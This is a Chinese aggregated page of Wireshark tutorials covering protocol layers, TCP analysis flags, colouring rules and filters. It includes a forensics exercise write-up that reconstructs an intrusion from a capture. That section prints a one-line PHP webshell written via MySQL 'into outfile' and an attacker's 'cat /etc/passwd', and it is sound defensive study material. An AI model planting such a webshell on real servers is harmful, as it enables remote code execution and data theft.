-
2018-04-21 16:16:30
wireshark是非常流行的网络封包分析软件,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。使用wireshark的人必须了解网络协议,否则就看不懂wireshark了。
为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。wireshark能获取HTTP,也能获取HTTPS,但是不能解密HTTPS,所以wireshark看不懂HTTPS中的内容,总结,如果是处理HTTP,HTTPS 还是用Fiddler, 其他协议比如TCP,UDP 就用wireshark.
随便打开一个包
- Frame:物理层的数据帧概况。
- Ethernet II:数据链路层以太网帧头部信息。
- Internet Protocol Version 4:互联网层IP包头部信息。
- Transmission Control Protocol:传输层的数据段头部信息,此处是TCP协议。
User Datagram Protocol:UDP协议 - Hypertext Transfer Protocol:应用层的信息,此处是HTTP协议
各层分析
一、物理层Frame
-Frame 5: 66 bytes on wire (528 bits), 66 bytes captured(捕获) (528 bits) on interface 0 //5号帧,对方发送66字节,实际收到66字节 -Interface id: 0 (\Device\NPF_{37239901-4A63-419C-9693-97957A8232CD}) //接口id为0 -Encapsulation type: Ethernet (1) //封装类型 -Arrival Time: Jul 5, 2017 15:14:31.865685000 //捕获日期和时间(中国标准时间) -[Time shift for this packet: 0.000000000 seconds] -Epoch Time: 1499238871.865685000 seconds -[Time delta from previous captured frame: 0.006861000 seconds] //与前一包时间间隔 -[Time delta from previous displayed frame: 0.006861000 seconds] -[Time since reference or first frame: 0.613985000 seconds] //#此包与第一帧的时间间隔 -Frame Number: 5 //帧序号 -Frame Length: 66 bytes (528 bits) //帧长度 -Capture Length: 66 bytes (528 bits) //捕获字节长度 -[Frame is marked: False] //是否做了标记 -[Frame is ignored: False] //是否被忽略 -[Protocols in frame: eth:ethertype:ip:tcp] //帧内封装的协议层次结构 -[Coloring Rule Name: HTTP] //着色标记的协议名称 -[Coloring Rule String: http || tcp.port == 80 || http2] //着色规则显示的字符串
二、数据链路层以太网帧头部信息
-Ethernet II, Src: Tp-LinkT_f5:3e:62 (c0:61:18:f5:3e:62), Dst: IntelCor_09:65:a5 (58:fb:84:09:65:a5) - Destination: IntelCor_09:65:a5 (58:fb:84:09:65:a5) //目的MAC地址 - Source: Tp-LinkT_f5:3e:62 (c0:61:18:f5:3e:62) //源MAC地址(就是我电脑的MAC地址) - Type: IPv4 (0x0800) //0x0800表示使用IP协议
三、互联网层IP包头部信息
Internet Protocol Version 4, Src: 192.168.2.112, Dst: 116.211.185.142 0100 .... = Version: 4 //IPV4协议 .... 0101 = Header Length: 20 bytes (5) //包头长度 -Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT) //差分服务字段 -Total Length: 52 //IP包总长度 -Identification: 0x3849 (14409) //标识字段 -Flags: 0x02 (Don't Fragment) //标记字段 -Fragment offset: 0 //分段偏移量 -Time to live: 128 //生存期TTL -Protocol: TCP (6) //此包内封装的上层协议为TCP -Header checksum: 0xd100 [validation disabled] //头部数据的校验和 -[Header checksum status: Unverified] //头部数据校验状态 -Source: 192.168.2.112 //源IP地址 -Destination: 116.211.185.142 //目的IP地址 -[Source GeoIP: Unknown] //基于地理位置的IP -[Destination GeoIP: Unknown]
四、传输层TCP数据段头部信息
Transmission Control Protocol, Src Port: 60606, Dst Port: 80, Seq: 0, Len: 0 -Source Port: 60606 //源端口号(ecbe) -Destination Port: 80 //目的端口号(0050) -[Stream index: 0] -[TCP Segment Len: 0] -Sequence number: 0 (relative sequence number) //序列号(相对序列号)(四个字节fd 3e dd a2) -Acknowledgment number: 0 //确认号(四个字节00 00 00 00) -Header Length: 32 bytes //头部长度(0x80) -Flags: 0x002 (SYN) //TCP标记字段 -Window size value: 8192 //流量控制的窗口大小(20 00) -[Calculated window size: 8192] -Checksum: 0x97ad [unverified] //数据段的校验和(97 ad) -[Checksum Status: Unverified] -Urgent pointer: 0 //紧急指针(00 00) -Options: (12 bytes), Maximum segment size, No-Operation (NOP), Window scale, No-Operation (NOP), No-Operation (NOP), SACK permitted //选项(可变长度
五、UDP数据段首部
User Datagram Protocol, Src Port: 7273, Dst Port: 15030 -Source Port: 7273 //源端口(1c 69) -Destination Port: 15030 //目的端口(3a 6b) -Length: 1410 //长度(05 82) -Checksum: 0xd729 [unverified] //校验和(d7 29) -[Checksum Status: Unverified] -[Stream index: 6335]
参考博客:https://my.oschina.net/u/1585857/blog/479306
Wireshark的常见几种过滤方法更多相关内容 -
Wireshark数据包分析实战数据包(第三版).rar
2021-08-18 19:48:17Wireshark数据包分析实战数据包(第三版).rar -
Wireshark 数据包分析实战
2018-11-10 20:53:46Wireshark 数据包分析实战,学习怎么抓包,分析网络包,学习网络协议 -
wireshark分析数据包
2021-01-13 10:57:31当Wireshark抓包时候,数据包标记为TCP Out-Of-Order,意思是该数据包的发送顺序不对。这意味着网络状况不好。当然,Wireshark有时会重传的包识别为乱序包。 [TCP Dup Ack] 一般来说是网络拥塞导致丢包,比如发送方...抓包常见的信息以及含义
Packet size limited during capture
说明被标记的那个包没有抓全。一般是由抓包方式引起,有些操作系统中默认只抓每个帧的前96个字节。
4号包全长171字节,但只有96字节被抓到。
TCP Previous segment not captured
说明乱序了,前一个包没有收到,收到后面的包了,这时会重传包。Wireshark发现后一个包的Seq大于前一个包的Seq+Len,就知道中间缺失了一段。如果缺失的那段在整个网络包中找不到(排除了乱序),就会提示。
6号包的Seq是1449大于5号包的Seq+Len=1+1=1,说明中间有个1448字节的包没被抓到,就是“Seq=1,Len=1448”。
‘
175: SEQ=4675 大于 174: SEQ=Seq(4381)+0 (len)
[TCP Retransmission]
一个包真的丢了,又没有后续包可以在接收方触发【Dup Ack】就不会快速重传。这种情况下发送方只好等到超时了再重传。超时重新发送,当发送方送出一个TCP片段后,将开始计时,等待该TCP片段的ACK回复。如果接收方正确接收到符合次序的片段,接收方会利用ACK片段回复发送方。发送方得到ACK回复后,继续移动窗口,发送接下来的TCP片段。如果直到计时完成,发送方还是没有收到ACK回复,那么发送方推断之前发送的TCP片段丢失,因此重新发送之前的TCP片段。这个计时等待的时间叫做重新发送超时时间。
[TCP segment of a reassembled PDU]
TCP层收到上层大块报文后分解成段后发出去,主机响应一个查询或者命令时如果要回应很多数据(信息)而这些数据超出了TCP的最大MSS时就要分片了,被分片出来的包,就会被标记了成TCP segment of a reassembled PDU,被标记了的包的SEQ和ACK都和原来的包一致。
TCP Out-Of-Order含义
使用TCP传输较大数据时,都会将数据分片,然后按照顺序依次传输。当Wireshark抓包时候,数据包标记为TCP Out-Of-Order,意思是该数据包的发送顺序不对。这意味着网络状况不好。当然,Wireshark有时会重传的包识别为乱序包。
[TCP Dup Ack]
一般来说是网络拥塞导致丢包,比如发送方的报文到达不了接收方,接受方收不到预期序列号的报文就会发送dup ack给发送方,发送方收到3个dup ack就会快速重传而不必等超时定时器。
TCP dup ack XXX#X:
就是接收端要求发送方重复应答XXX序号丢失的报文,#后面X的是表示第几次丢失。当网络中存在乱序或者丢包时,将会导致接收端接收到的seq number不连续。此时接收端会向发送端回复重复ack,ack值为期望收到的下一个seq number。重复ack数大于等于3次将会触发快速重传。
[TCP Fast Retransmission]
快速重新发送 ,由于IP包的传输是无序的,所以接收方有可能先收到后发出的片段,也就是乱序(out-of-order)片段。乱序片段的序号并不等于最近发出的ACK回复号。已接收的文本流和乱序片段之间将出现空洞(hole),也就是等待接收的空位。比如已经接收了正常片段5,6,7,此时又接收乱序片段9。这时片段8依然空缺,片段8的位置就是一个空洞。TCP协议规定,当接收方收到乱序片段的时候,需要重复发送ACK。比如接收到乱序片段9的时候,接收方需要回复ACK。回复号为8 (7+1)。此后接收方如果继续收到乱序片段(序号不是8的片段),将再次重复发送ACK=8。当发送方收到3个ACK=8的回复时,发送方推断片段8丢失。即使此时片段8的计时器还没有超时,发送方会打断计时,直接重新发送片段8,这就是快速重新发送机制(fast-retransmission)。
325包,客户端向服务端反馈ack=133251,说明下一个期望收到服务端seq=133251的包;
326包,服务端向客户端发送了seq=135771的数据包,与客户端的期望不符,因此客户端在327包重传了ack=133251的包,再次申明期望收到seq=133251的包。Wireshark将重复ack标记为TCP Dup ACK,#后边指明为第几次重传。
328包,服务端向客户端发送了seq=137031的数据包,仍然与客户端期望不符,客户端在329包再次重传ack=133251的包。
330包,服务端收到3次重复ack,触发快速重传,重传了seq=133251的TCP分片。Tcp keep alive(tcp保持活动)
在TCP中有一个Keep-alive的机制可以检测死连接,原理很简单,TCP会在空闲了一定时间后发送数据给对方:
1.如果主机可达,对方就会响应ACK应答,就认为是存活的。
2.如果可达,但应用程序退出,对方就发RST应答,发送TCP撤消连接。
3.如果可达,但应用程序崩溃,对方就发FIN消息。
4.如果对方主机不响应ack, rst,继续发送直到超时,就撤消连接。这个时间就是默认
的二个小时。
KeepAliveTime值控制 TCP/IP 尝试验证空闲连接是否完好的频率。如果这段时间内没有活动,则会发送保持活动信号。如果网络工作正常,而且接收方是活动的,它就会响应。如果需要对丢失接收方敏感,换句话说,需要更快地发现丢失了接收方,请考虑减小这个值。如果长期不活动的空闲连接出现次数较多,而丢失接收方的情况出现较少,您可能会要提高该值以减少开销。缺省情况下,如果空闲连接 7200000 毫秒(2 小时)内没有活动,Windows 就发送保持活动的消息。通常,1800000 毫秒是首选值,从而一半的已关闭连接会在 30 分钟内被检测到。
TCP ACKed unseen segment
当Wireshark发现被Ack的那个包没被抓到,就会提示。
32号包的Seq+Len=6889+1448=8337,说明下一个包Seq=8337。
而我们看到的是35号包的Seq=11233,意味着8337~11232这段数据没抓到。
TCP acked unseen segment
反馈ACK指向了一个未知的TCP片段。
这个意思是说ACK反馈的是一个wireshark上不存在的TCP包。很可能是wireshark漏抓了这个包,但却抓到了对端反馈的该报的ack包。如下图,标记为ack unseen segment的包反馈的ack=2721,看着像是反馈的seq=1361的包,但其实这个ack还反馈了seq=1的包,由于seq=1的包没有抓到,因此wireshark将反馈ack标记为ack unseen segment。从下面的图还可知,由于对端已经反馈了ack=2721,说明发端发送的seq=1的包,对端也收到了,只不过wireshark可能漏抓了而已。RST
TCP 重置。
是TCP协议结束异常连接的一种方式,通过flags中的reset=1标记。当TCP连接无法通过正常的4次挥手结束时,一方可以通过发送携带reset标志的TCP包结束TCP连接。
如下图,发送方通过2个TCP流发送数据,截图中,接收方首先向发送方反馈了TCP window=0,让发送方暂缓发送数据,之后紧接着发送了TCP RST标记,释放了TCP连接。猜测可能接收方程序突然崩溃了,导致缓存区数据没法清空,之后接收方系统发送了TCP reset释放TCP连接。Tcpacked lost segment(tcp应答丢失)
Tcp window update(tcp窗口更新)
流量图
wireshark的颜色含义
颜色控制
可以粗略地看到,黑色背景代表报文的各类错误,红色背景代表各类异常情景,其它颜色代表正常。
Bad TCP:tcp.analysis.flags && !tcp.analysis.window_update
即TCP解析出错,通常重传,乱序,丢包,重复响应都在此条规则的范围内。
HSRP State Change:hsrp.state != 8 && hsrp.state != 16
HSRP即热备份路由协议(Hot Standby Router Protocol),这条规则表示状态非active和standby。
Spanning Tree Topology Change:stp.type == 0x80
生成树协议的状态标记为0x80,生成树拓扑发生变化。
OSPF State Change:ospf.msg != 1
OSPF(Open Shortest Path First,开放式最短路径优先协议)的msg类型不是hello。
ICMP errors:icmp.type eq 3 || icmp.type eq 4 || icmp.type eq 5 || icmp.type eq 11 || icmpv6.type eq 1 || icmpv6.type eq 2 || icmpv6.type eq 3 || icmpv6.type eq 4
ICMP协议错误,协议的type字段值错误。
ARP:arp
即ARP协议
ICMP:icmp || icmpv6
即icmp协议
TCP RST:tcp.flags.reset eq 1
TCP流被RESET。
SCTP ABORT:sctp.chunk_type eq ABORT
串流控制协议的chunk_type为ABORT(6)。
TTL low or unexpected:( ! ip.dst == 224.0.0.0/4 && ip.ttl < 5 && !pim) || (ip.dst == 224.0.0.0/24 && ip.dst != 224.0.0.251 && ip.ttl != 1 && !(vrrp || carp))
TTL异常。
Checksum Errors:eth.fcs_bad==1 || ip.checksum_bad==1 || tcp.checksum_bad==1 || udp.checksum_bad==1 || sctp.checksum_bad==1 || mstp.checksum_bad==1 || cdp.checksum_bad==1 || edp.checksum_bad==1 || wlan.fcs_bad==1
条件中的各类协议的checksum异常,在PC上抓包时网卡的一些设置经常会使Wireshark显示此错误。
SMB:smb || nbss || nbns || nbipx || ipxsap || netbios
Server Message Block类协议。
HTTP:http || tcp.port == 80 || http2
HTTP协议,这是很简陋的识别方法。
IPX:ipx || spx
互联网络数据包交换(Internet work Packet Exchange)类协议。
DCERPC:dcerpc
即DCE/RPC,分散式运算环境/远端过程调用(Distributed Computing Environment / Remote Procedure Calls)协议。
Routing:hsrp || eigrp || ospf || bgp || cdp || vrrp || carp || gvrp || igmp || ismp
路由类协议。
TCP SYN/FIN:tcp.flags & 0x02 || tcp.flags.fin == 1
TCP连接的起始和关闭。
TCP:tcp
TCP协议。
UDP:udp
UDP协议。
Broadcast:eth[0] & 1
广播数据。
参考链接:
https://blog.csdn.net/baozhourui/article/details/88373622
https://blog.csdn.net/hguisu/article/details/46273261
https://segmentfault.com/a/1190000013734767
https://www.cnblogs.com/thammer/p/5135827.html
-
Wireshark 数据包分析实战详解 PDF版
2019-07-10 12:12:28本书共分3篇。第1篇介绍Wireshark的各项功能,包括基础知识、Wireshark的定制、捕获过滤器和显示过滤器的使用、数据包的着色、导出和重组等;...第3篇介绍借助Wireshark分析操作系统启动过程中的网络通信情况。 -
wireshark数据包分析实战详解pdf 有目录完整
2018-10-31 10:23:46Wireshark 数据包分析实战详解;带目录 完整 扫描清晰版 -
Wireshark数据包分析实战(第三版)抓包资源文件.tar.gz
2019-06-24 11:17:59Wireshark数据包分析实战(第三版)抓包资源文件,从原书第三版提供的网站上下再的示例资源文件。 -
Wireshark数据包分析实战(第2版)捕获文件.rar
2021-08-18 19:47:48Wireshark数据包分析实战(第2版)捕获文件.rar -
Wireshark数据包分析实战
2019-03-18 11:49:13Wiresh软件详细介绍,数据包分析,数据包嗅探或协议分析:指捕获和解析网络上在线传输数据的过程,为了能更好地了解网络上正在发生的事情 -
Wireshark数据包分析(详细解析)
2022-04-01 10:28:40wireshark数据包分析 Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文...wireshark数据包分析
Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
数据包分析器又名嗅探(Sniffers),是一种网络流量数据分析的手段,常见于网络安全领域使用,也有用于业务分析领域,一般是指使用嗅探器对数据流的数据截获与分组分析(Packet analysis)。
wireshark下载地址 https://www.wireshark.org/download.html
以上摘自百度
1.某公司网络系统存在异常,猜测可能有黑客对公司的服务器实施了一系列的扫描和攻击,使用Wireshark抓包分析软件查看并分析Kali Linux的/root目录下dump.pcapng数据包文件,找到黑客的IP地址,并将黑客的IP地址作为Flag值(如:172.16.1.1)提交;
过滤tcp.connection.syn (tcp)包
Source来源,Destination目的地
来源地址172.16.1.110,所以黑客ip172.16.1.110
2.继续分析数据包文件dump.pcapng分析出黑客通过工具对目标服务器的哪些服务进行了密码暴力枚举渗透测试,将服务对应的端口依照从小到大的顺序依次排列作为Flag值(如:77/88/99/166/1888)提交;过滤tcp.connection.syn and ip.src == 172.16.1.110
发现ftp,ssh,telnet,mysql,所以端口有21/22/23/3306
3.黑客扫描后可能首先对目标服务器的某个服务实施了攻击,继续查看数据包文件dump.pcapng分析出黑客成功破解了哪个服务的密码,并将该服务的版本号作为Flag值(如:5.1.10)提交;过滤 ip.addr == 172.16.1.110 and tcp.port == 3306
request请求,追踪流TCP,服务版本5.7.26
4.继续分析数据包文件dump.pcapng,黑客通过数据库写入了木马,将写入的木马名称作为Flag值提交(名称不包含后缀);过滤mysql,黑客利用mysql上传了一个php木马,tcp追踪流
发现黑客在/var/www/html上传,horse.php木马
5.继续分析数据包文件dump.pcapng,黑客通过数据库写入了木马,将黑客写入的一句话木马的连接密码作为Flag值提交;
黑客在mysql写入,select ‘<?php @eval($_POST[lqsym])?>’ into outfile ‘/avr/www/html/horse.php’
6.继续分析数据包文件dump.pcapng,找出黑客连接一句话木马后查看了什么文件,将黑客查看的文件名称作为Flag值提交;
黑客是在/var/www/html上传的木马,所以要在数据包过滤http
http connections “horse.php”
追踪流,HTTP,发现路径遍,黑客使用了cat /etc/passwd命令,所以黑客查看的文件名称是passwd
7.继续分析数据包文件dump.pcapng,黑客可能找到异常用户后再次对目标服务器的某个服务进行了密码暴力枚举渗透,成功破解出服务的密码后登录到服务器中下载了一张图片,将图片文件中的英文单词作为Flag值提交。
发现黑客使用了/etc/passwd路径遍历发现suictsr247用户
在主页搜索字符串suictsr247
黑客对靶机实施ftp暴力破解,使用过滤规则ftp contains “230” 进行过滤
追踪流tcp
会话流发现flag.jpg的文件大小为56489字节
过滤ftp-data
追踪任意一个包,TCP,要改为原始数据查看
-
wireshark数据包分析实战详解 pdf 带目录完整下载
2018-02-24 22:43:29Wireshark 数据包分析实战详解;带目录 完整 扫描清晰版;实体书链接:http://product.china-pub.com/4613681 -
Wireshark数据包分析实战(第3版)超高清带书签【英文版】
2019-02-15 17:03:14Wireshark数据包分析实战(第3版)- 【英文版】- 超高清带书签,目前还没有中文版的扫描件 -
Wireshark分析数据包
2017-11-22 17:52:23Wireshark分析数据包一.协议TCP/IP协议栈:应用层,运输层,网络层,数据链路层 1.应用层协议 文件传输类:HTTP、FTP、TFTP; 远程登录类:Telnet; 电子邮件类:SMTP; 网络管理类:SNMP; 域名解析类...Wireshark分析数据包
一.协议
TCP/IP协议栈:应用层,运输层,网络层,数据链路层
1.应用层协议
文件传输类:HTTP、FTP、TFTP;
远程登录类:Telnet;
电子邮件类:SMTP;
网络管理类:SNMP;
域名解析类:DNS;
2.运输层协议
SSL:运输层数据加密协议
Tcp:传输控制协议,可靠传输(三次握手,四次断开)
Udp:广播式数据传输,不可靠传输3.网络层协议
ICMP:Internet控制报文协议,它是TCP/IP协议族的一个子协议,
用于在IP主机、路由器之间传递控制消息。控制消息是指
网络通不 通、主机是否可达、路由是否可用等网络本身的
消息。这些控制消息虽然并不传输用户数据,但是对于用户
数据的传递起着重要的作用。
IGMP:Internet 组管理协议,该协议运行在主机和组播路由器之
间。
IP:用于将多个包交换网络连接起来的,它在源地址和目的地址之
间传送一种称之为数据包的东西,它还提供对数据大小的重新
组装功能,以适应不同网络对包大小的要求。4.链路层协议
PPP:点对点协议,为两个对等节点之间的 IP 流量传输提供一种
封装协议。5.TCP/IP协议栈图
TCP协议部分的详细内容可参考:http://www.cnblogs.com/ImBit/p/5513401.html
二.Wireshark的使用
1.Wireshark界面介绍
可参考:http://www.cnblogs.com/TankXiao/archive/2012/10/10/2711777.html
Wireshark里封包列表中的time显示,View->Time Display Format,可以设置时间的显示格式。
2.显示过滤器的使用
过滤器支持的运算符如下:
(1).根据协议过滤:
关键字:DNS,HTTP,TCP,UDP
(2).根据IP过滤
源IP: ip.src == 10.41.191.72 (ip.src eq 10.41.191.72)
目标IP: ip.dst == 10.41.191.72 ( ip.dst eq 10.41.191.72)
不区分源及目标的IP: ip.addr == 10.41.191.72
(ip.addr eq 10.41.191.72)
(3)组合过滤
使用逻辑运算符,组合各个关键字进行过滤,比如:
DNS or (ip.addr eq 10.41.191.72 and ip.addr eq 180.149.132.47) and
(tcp.port eq 48358 and tcp.port eq 80)
这里的关键字有非常多,可以查看:Expression选项中的列表
(4)过滤快捷键
在封包列表中,光标放在具体IP上,右键,选择Apply as Filter或者Prepare a Filter,然后选择逻辑运算符,此时会自动把光标所在的IP转换成过滤语句显示在过滤器中。
(5)过滤具体封包的整个流程
参见上图,可以选定某条封包,右键,选择:Follw TCP Stream/Follw UDP Stream/Follw SSL Stream,这样就会列出当前封包的具体流程(TCP/UDP/SSL)。(6)普通的关键字查找
Ctrl+F: 普通查找3.序列号与确认号
可参考:http://blog.csdn.net/liubaoxyz/article/details/49949439
可参考:http://www.xianren.org/net/wireshark-q.html
http://blog.csdn.net/faithc/article/details/52832617?locationNum=1&fps=1四.Debug思路
手机
1.确认网络连接情况。(如果使用的移动数据,检查cs,ps的连接情况,pdp链路是否正常。以上都正常情况下再去看netlog)
2.确认时间点与对应的IP。(main_log中搜索socket,查找对应时间点对应的IP。如果都找不到,通过DNS查找对应网站的IP:dns.qry.name contains qq)
3.根据IP或者时间点去查看对应的TCP流。(根据序列号和确认号确定异常点,再依据异常点去看收发包情况)五.进阶
-
Wireshark数据包分析实战(第二版)
2014-06-29 14:24:164.2分析数据包 4.2.1查找数据包 4.2.2标记数据包 4.2.3打印数据包 4.3设定时间显示格式和相对参考 4.3.1时间显示格式 4.3.2数据包的相对时间参考 4.4设定捕获选项 4.4.1捕获设定 4.4.2捕获文件设定 4.4.3停止捕获... -
Wireshark数据包分析实战_PDF电子书下载 带书签目录 完整版
2018-03-21 23:55:05Wireshark数据包分析实战_PDF电子书下载 带书签目录 清晰完整 -
wireshark数据包分析.pdf
2021-01-25 18:13:16wireshark数据包分析 -
Wireshark 数据包分析实战详解
2018-06-24 18:42:13第3篇介绍借助Wireshark分析操作系统启动过程中的网络通信情况。 《Wireshark数据包分析实战详解》涉及面广,内容包括工具使用、网络协议和应用。本书适合各类读者群体,如想全面学习Wireshark的初学者、网络管理员... -
wireshark数据包分析实战(第二版)+源码.rar
2019-05-14 14:31:00Practical Packet Analysis will teach you to make sense of your packet captures so that you can better troubleshoot network problems. You’ll find added coverage of IPv6 and SMTP, a new chapter on the ... -
网络分析系列之十二 使用Wireshark分析数据包的技巧
2019-09-06 09:45:57在进行数据包分析过程,一定会遇到成千上万的数据包需要分析的常见。如何在如此大量数据的环境中快速得到你想要的对象,提高分析效率和精准度呢?采用常见的分析技巧,也许能给你带来极大的帮助。 本节介绍如何使用... -
[网络安全课程实验]:WireShark数据包分析
2020-05-12 15:18:26实验:WireShark数据包分析 一、实验目的 二、实验环境 三、实验内容与实验要求 四、实验过程与分析 TCP三次握手 第一次握手 第二次握手 第三次握手 UDP 五、实验结果总结 实验:WireShark数据包分析 ... -
Wireshark 数据包分析实战(第2版)[带目录].pdf
2018-04-06 18:10:05Wireshark 数据包分析实战(第2版)[带目录].pdf Wireshark 数据包分析实战(第2版)[带目录].pdf Wireshark 数据包分析实战(第2版)[带目录].pdf -
Wireshark数据包分析浅析
2020-01-19 12:12:42Wireshark数据包分析 数据包分析器又名嗅探(Sniffers),是一种网络流量数据分析的手段,常见于网络安全领域使用,也有用于业务分析领域,一般是指使用嗅探器对数据流的数据截获与分组分析(Packet analysis)。 ... -
wireshark数据包分析.rar
2021-06-06 22:15:47wireshark数据包分析.rar -
网络分析系列之使用wireshark分析数据包的技巧
2020-03-20 23:41:15在进行数据包分析过程,一定会遇到成千上万的数据包需要分析的常见。如何在如此大量数据的环境中快速得到你想要的对象,提高分析效率和精准度呢?采用常见的分析技巧,也许能给你带来极大的帮助。 本节介绍如何使用... -
Wireshark数据包分析实战 第2版 第二部分
2014-11-14 09:08:13花5大洋请人做的PDF文档。上传大小有限制,请一起下载两个压缩文件,在同一目录解压即可。 -
wireshark数据包分析实战详解(解压密码:CSDN)
2017-12-26 13:34:33wireshark数据包分析实战详解(解压密码:CSDN),扫描版的;有目录;一共3篇21章。 -
Wireshark数据包分析实战(第2版)捕获文件
2017-12-02 10:23:38Wireshark数据包分析实战(第2版)数据包捕获文件,国外作者网站下载. -
wireshark数据包结构解析图
2009-08-06 11:58:05wireshark数据包结构解析图,bmp格式